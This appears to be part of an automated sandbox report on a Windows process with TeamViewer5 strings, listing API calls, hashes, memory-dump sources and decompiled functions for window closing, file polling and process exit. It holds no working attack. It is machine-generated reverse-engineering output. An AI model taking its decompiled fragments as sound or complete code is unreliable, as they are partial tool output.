                                                                                                                        • Instruction ID: 29d6f13638d0993f3e0a8b13f1bf11f7bfa277bd62d3ba558cd9a01db6c5939e
                                                                                                                        • Opcode Fuzzy Hash: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction Fuzzy Hash: EC115EB2B046A4EBEB10EF60C91AB1537ACF722724F00850CF985CB2C1CB75E4698F16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0053479F
                                                                                                                          • Part of subcall function 005445FC: __mtinitlocknum.LIBCMT ref: 00544610
                                                                                                                          • Part of subcall function 005445FC: __amsg_exit.LIBCMT ref: 0054461C
                                                                                                                          • Part of subcall function 005445FC: EnterCriticalSection.KERNEL32(?,?,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00544624
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                                        • HeapFree.KERNEL32(00000000,005343D6,007D55F8,0000000C,005445DD,00000000,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840,0000000C), ref: 005347E9
                                                                                                                        • GetLastError.KERNEL32(?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 005347FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: 6cd2ecc568039ce1914cf72dfb0ca282ceb4614ede5004a7f77ad4998f14ae1f
                                                                                                                        • Instruction ID: aa6f19fdca9f5d674bc5b41208df79506562bb03828fa21c8c922d719d85d9b4
                                                                                                                        • Opcode Fuzzy Hash: 6cd2ecc568039ce1914cf72dfb0ca282ceb4614ede5004a7f77ad4998f14ae1f
                                                                                                                        • Instruction Fuzzy Hash: DC016271941212ABEF206FB1AC0E79E7FA4BF82725F208619F501A60D1DB38A9418F58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332D50() {
                                                                                                                        				struct HWND__* _t1;
                                                                                                                        				int _t3;
                                                                                                                        				void* _t10;
                                                                                                                        
                                                                                                                        				_t1 =  *0x6f340398; // 0x900c2
                                                                                                                        				if(_t1 != 0) {
                                                                                                                        					_t3 = IsWindow(_t1);
                                                                                                                        					_t1 =  *0x6f340398; // 0x900c2
                                                                                                                        					if(_t3 != 0) {
                                                                                                                        						PostMessageA(_t1, 0x10, 0, 0);
                                                                                                                        						_t1 =  *0x6f340398; // 0x900c2
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t10 = 0;
                                                                                                                        				while(_t1 != 0 && IsWindow(_t1) != 0) {
                                                                                                                        					Sleep(0x3e8);
                                                                                                                        					_t10 = _t10 + 1;
                                                                                                                        					if(_t10 < 0xa) {
                                                                                                                        						_t1 =  *0x6f340398; // 0x900c2
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				ExitProcess(0);
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1225241566-0
                                                                                                                        • Opcode ID: 96b7273d5526f07ef142c503ff518529b87dc2b562b7db9f2bbd9aae30797ac1
                                                                                                                        • Instruction ID: f91ca1ccadcb87735e5ada1e215396bb47b15f30d2e55129e197c4c3ab5191d8
                                                                                                                        • Opcode Fuzzy Hash: 96b7273d5526f07ef142c503ff518529b87dc2b562b7db9f2bbd9aae30797ac1
                                                                                                                        • Instruction Fuzzy Hash: 87F02E73F407A6A7EA50EB7DCD85F46379C974AB21F000118BD54D7080CA30F8208EB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332340(intOrPtr* _a4) {
                                                                                                                        				intOrPtr* _t15;
                                                                                                                        
                                                                                                                        				Sleep(0xbb8);
                                                                                                                        				_t15 = _a4;
                                                                                                                        				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
                                                                                                                        					do {
                                                                                                                        						Sleep(0x7d0);
                                                                                                                        					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff);
                                                                                                                        					E6F331C00(_t15);
                                                                                                                        					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
                                                                                                                        					 *(_t15 + 0x24) = 0;
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 6F33234D
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F33236A
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6F332370
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33238B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33239A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4254501734-0
                                                                                                                        • Opcode ID: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction ID: 569a18e446c410d1e6072e679a0f8067d002a8a09c78fe39bb27979818edb659
                                                                                                                        • Opcode Fuzzy Hash: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction Fuzzy Hash: 43F09A32900B54ABD760EB66CD84B46B3ACBF45B34F210A1DE2869A0C0C7B4F450CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                          • Part of subcall function 004E69B9: __EH_prolog3.LIBCMT ref: 004E69C0
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                          • Part of subcall function 004E7898: __EH_prolog3.LIBCMT ref: 004E789F
                                                                                                                          • Part of subcall function 004E6666: __EH_prolog3.LIBCMT ref: 004E666D
                                                                                                                          • Part of subcall function 004E4AAC: __EH_prolog3.LIBCMT ref: 004E4AB3
                                                                                                                          • Part of subcall function 004E4947: __EH_prolog3.LIBCMT ref: 004E494E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection$_malloc
                                                                                                                        • String ID: 127.0.0.1$GWM.CreateClientSession.NoTV$abgehende Verbindung zum internen TV
                                                                                                                        • API String ID: 1928159127-4222465694
                                                                                                                        • Opcode ID: 9af2e94d875c2923571cbc0ad0ef90227fbd2b0c14b112fb4cd1cccabf4603c5
                                                                                                                        • Instruction ID: 3c3d561ff2f9059716d7455960b207cfb48b07e84143a77ce54bf4f6a5edfbaa
                                                                                                                        • Opcode Fuzzy Hash: 9af2e94d875c2923571cbc0ad0ef90227fbd2b0c14b112fb4cd1cccabf4603c5
                                                                                                                        • Instruction Fuzzy Hash: A0C17570D0428DEFDF05EBE5C955AEEBBB5AF19308F10405EE04177282DB786A08DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteH_prolog3__swprintf
                                                                                                                        • String ID: Reason$RouterID$SetState
                                                                                                                        • API String ID: 2349881506-2759572203
                                                                                                                        • Opcode ID: 477a0da1ce706fc61555f92cbe08172d8b8d1595fa9a4a26d9fd11b3a4fe6685
                                                                                                                        • Instruction ID: 8800d0e28e9348c939cb44fead5162335e8717b1e02977930c0735c4cfa60360
                                                                                                                        • Opcode Fuzzy Hash: 477a0da1ce706fc61555f92cbe08172d8b8d1595fa9a4a26d9fd11b3a4fe6685
                                                                                                                        • Instruction Fuzzy Hash: D371927540418CEEDF01EFA4C992ADD7BB8AF21308F14819EF44667192EB786F09C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00502857
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00502883
                                                                                                                          • Part of subcall function 004E6B7B: __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                                          • Part of subcall function 00504380: _strncpy.LIBCMT ref: 0050438B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3__strncpyinet_ntoa
                                                                                                                        • String ID: #$Abgehend nach UDP
                                                                                                                        • API String ID: 3198417727-4203961990
                                                                                                                        • Opcode ID: fec2ff33af4e4f3641f47cfe900dcb6509f5f9d322439d09ca017e312f0cfc28
                                                                                                                        • Instruction ID: acb5f4cf4234d5cc500a320945d00df3f3d202aa659205eb6c641fcffbb41d1a
                                                                                                                        • Opcode Fuzzy Hash: fec2ff33af4e4f3641f47cfe900dcb6509f5f9d322439d09ca017e312f0cfc28
                                                                                                                        • Instruction Fuzzy Hash: AD51A3B0D00248AFDB10EBE5CD5ABEEBBB8BF55304F14405DE1456B181DBB46E48CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004BD7D8
                                                                                                                          • Part of subcall function 004BD53E: __EH_prolog3.LIBCMT ref: 004BD55D
                                                                                                                          • Part of subcall function 004BD53E: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000050), ref: 004BD595
                                                                                                                          • Part of subcall function 004BD53E: _wcsrchr.LIBCMT ref: 004BD5A1
                                                                                                                          • Part of subcall function 004BD53E: CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 004BD646
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 0053DE3E: __wfsopen.LIBCMT ref: 0053DE48
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A333B: __EH_prolog3.LIBCMT ref: 004A3342
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$CreateDeleteDirectoryEnterFileH_prolog3_LeaveModuleName__wfsopen_wcsrchr
                                                                                                                        • String ID: Machine:Logging$TeamViewer5_Logfile.log$TeamViewer5_Logfile2.log
                                                                                                                        • API String ID: 3802009478-2121897641
                                                                                                                        • Opcode ID: 9c23b1a807e15231a44482d615fcdb7b21ad7ba84ec6100c9a0aed2bedd050ef
                                                                                                                        • Instruction ID: 6c5781b4bed32351406fd563e79494c6a4f5cfc6a46ae1903238e98fccb940cc
                                                                                                                        • Opcode Fuzzy Hash: 9c23b1a807e15231a44482d615fcdb7b21ad7ba84ec6100c9a0aed2bedd050ef
                                                                                                                        • Instruction Fuzzy Hash: 5351D9B1C05348EECF15EBA4C951ADEBBB8AF25304F1485AEF045A7192EB385F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FF1EC
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 004FF20D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004FF29E
                                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3HandleInternetclosesocketinet_ntoashutdown
                                                                                                                        • String ID: Tz
                                                                                                                        • API String ID: 1444621331-4125522965
                                                                                                                        • Opcode ID: 3060048a79c542904756a1b86b1718ef9cefadeaefdc11ec60844fc71ab3545c
                                                                                                                        • Instruction ID: 33f1e450042c15d8d9c9b3706301f03ff0524d2692af621af367180bc154b9b2
                                                                                                                        • Opcode Fuzzy Hash: 3060048a79c542904756a1b86b1718ef9cefadeaefdc11ec60844fc71ab3545c
                                                                                                                        • Instruction Fuzzy Hash: 0B51C471D002099BDF15EFA1C896BEE77B4AF00314F14017EEA116B1D2DB785B49C7A9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004B7A32
                                                                                                                          • Part of subcall function 004B5667: __EH_prolog3.LIBCMT ref: 004B566E
                                                                                                                        • type_info::operator==.LIBCMT ref: 004B7A79
                                                                                                                        Strings
                                                                                                                        • GetBool %1%: invalid typeid (.\TVObject.cpp, 133), xrefs: 004B7AD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_catchtype_info::operator==
                                                                                                                        • String ID: GetBool %1%: invalid typeid (.\TVObject.cpp, 133)
                                                                                                                        • API String ID: 2010590579-284449076
                                                                                                                        • Opcode ID: fa64f7b1247faedaa847d4f6a77f404501e89299800914cca683e46b33a473d1
                                                                                                                        • Instruction ID: a9302d27a509db936128fe6c18a3d3f6a732ec724cc83fb8c508a93be74b9f46
                                                                                                                        • Opcode Fuzzy Hash: fa64f7b1247faedaa847d4f6a77f404501e89299800914cca683e46b33a473d1
                                                                                                                        • Instruction Fuzzy Hash: C131C330A05209EBCF14EBA0C519AEDBB75BF85705F20406AF502BB2D1CB399F45DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                        • GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                          • Part of subcall function 0049B401: __EH_prolog3_GS.LIBCMT ref: 0049B408
                                                                                                                          • Part of subcall function 004377A7: __EH_prolog3.LIBCMT ref: 004377AE
                                                                                                                          • Part of subcall function 0041B2BC: __EH_prolog3.LIBCMT ref: 0041B2C3
                                                                                                                          • Part of subcall function 0043775C: __EH_prolog3.LIBCMT ref: 00437763
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                          • Part of subcall function 0040D733: char_traits.LIBCPMT ref: 0040D758
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ErrorH_prolog3_Lastchar_traits
                                                                                                                        • String ID: operation failed with error $OS_Rng:
                                                                                                                        • API String ID: 2603861822-700108173
                                                                                                                        • Opcode ID: c819b6762bdf678c3ff748db3f1b5579489a0502b56a2e5af61cf74a91ab9eea
                                                                                                                        • Instruction ID: 3dd9ab46a790745f88348808fbd2688a7aa5c78e29401b51255e0c78f3d7e4a6
                                                                                                                        • Opcode Fuzzy Hash: c819b6762bdf678c3ff748db3f1b5579489a0502b56a2e5af61cf74a91ab9eea
                                                                                                                        • Instruction Fuzzy Hash: 69115EB2900158AADB21EBA5DC46EDFBAB8AF55704F00407EF509B7182DA781A09C7B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FEB38
                                                                                                                        • connect.WS2_32(000000FF,0080B3C4,00000010), ref: 004FEB6D
                                                                                                                        • WSAGetLastError.WS2_32 ref: 004FEB73
                                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004BF6CE,?,00000000,00784028,00000000), ref: 004A1863
                                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        • ncSocket::NotifySocket(): connect error code: , xrefs: 004FEB96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteErrorH_prolog3_Last_swprintfconnect
                                                                                                                        • String ID: ncSocket::NotifySocket(): connect error code:
                                                                                                                        • API String ID: 621515900-2945146241
                                                                                                                        • Opcode ID: 50255745ec3ca45fed0bde5cdbc8f0377749779705cdb159496a0795fb1705fc
                                                                                                                        • Instruction ID: 419566dfe3d4eeeabf7ed428c344a919846746c461fd325833273f79c6a0e7b5
                                                                                                                        • Opcode Fuzzy Hash: 50255745ec3ca45fed0bde5cdbc8f0377749779705cdb159496a0795fb1705fc
                                                                                                                        • Instruction Fuzzy Hash: 0C21C670C04289EADB15EBA4CC9AAEEBB34AF21305F14416DE152672E1DB782E44C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049877B
                                                                                                                          • Part of subcall function 0047FD97: __EH_prolog3.LIBCMT ref: 0047FD9E
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004987DA
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • StringStore: missing InputBuffer argument, xrefs: 004987AB
                                                                                                                        • InputBuffer, xrefs: 0049879F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                                        • API String ID: 1412866469-2380213735
                                                                                                                        • Opcode ID: 44ec55b9b5fae38dfb7fa5c22f643a1cefd1d1a489f9f8346e48e67269840b60
                                                                                                                        • Instruction ID: 132df2d07a990b5e890274b4591fa2d819ca771c45cb11b3d84564ae36daedb5
                                                                                                                        • Opcode Fuzzy Hash: 44ec55b9b5fae38dfb7fa5c22f643a1cefd1d1a489f9f8346e48e67269840b60
                                                                                                                        • Instruction Fuzzy Hash: 89112B7194024AAFDF10EFE8C891DEEBBB5BF14304F5044AEE105A7282DB756E08CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA768
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,00000000,004DC578,000000FF,?,00000000,004DDCE3,00000001,WaitAtGateway,00000000,000003E4), ref: 004EA777
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeObjectSectionSingleWait
                                                                                                                        • String ID: Thread.Join.Failed$Thread.Join.Timeout
                                                                                                                        • API String ID: 1751434422-2669456123
                                                                                                                        • Opcode ID: 46ca84cd5f4a9857659830969dd8dcc59cab7544f09b66f277d9d625b23887c0
                                                                                                                        • Instruction ID: 6ccdec6453605177a1c9418ddd035f0f1f3f2c7586396fbc4a122f84fd1fb71d
                                                                                                                        • Opcode Fuzzy Hash: 46ca84cd5f4a9857659830969dd8dcc59cab7544f09b66f277d9d625b23887c0
                                                                                                                        • Instruction Fuzzy Hash: 2801D470A01110679A24BFB6881B49E7E21EF82772F20831AF5664B2D1DA385A50D7D6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054962F
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00549663
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?), ref: 00549694
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?), ref: 00549702
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: aea1ab6f5513ba04af648e8029ed810645809549fdcb4df93358e5e3ff2855a3
                                                                                                                        • Instruction ID: e5dd075bd14d5e75a6f249af7a3ff7156b7de346e643741568f76b5422eebeb9
                                                                                                                        • Opcode Fuzzy Hash: aea1ab6f5513ba04af648e8029ed810645809549fdcb4df93358e5e3ff2855a3
                                                                                                                        • Instruction Fuzzy Hash: D431BE31A04246EFDF20EFA4C886EEB7FB5BF01319F1689A9E4658B191D330D940DB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,2F9F5BE6,00000001,00000000), ref: 004A237D
                                                                                                                          • Part of subcall function 004A1DC7: __EH_prolog3_catch.LIBCMT ref: 004A1DCE
                                                                                                                          • Part of subcall function 004A1DC7: EnterCriticalSection.KERNEL32(?,0000000C,004A17D4,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1DDF
                                                                                                                          • Part of subcall function 004A1DC7: LeaveCriticalSection.KERNEL32(00000008,?,?,?,0044D2A4,00000002), ref: 004A1E1A
                                                                                                                        • _wmemset.LIBCPMT ref: 004A2399
                                                                                                                        • __vsnprintf_c_l.LIBCMT ref: 004A23AE
                                                                                                                          • Part of subcall function 00538691: __vswprintf_helper.LIBCMT ref: 005386A8
                                                                                                                          • Part of subcall function 004A1A2A: __EH_prolog3.LIBCMT ref: 004A1A31
                                                                                                                          • Part of subcall function 004A1A2A: InitializeCriticalSection.KERNEL32(?,00000028,004A24F0,?,00000000,00000000,00000000,?,?,00000002,?,00000000,0000042C), ref: 004A1A46
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 004A23E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
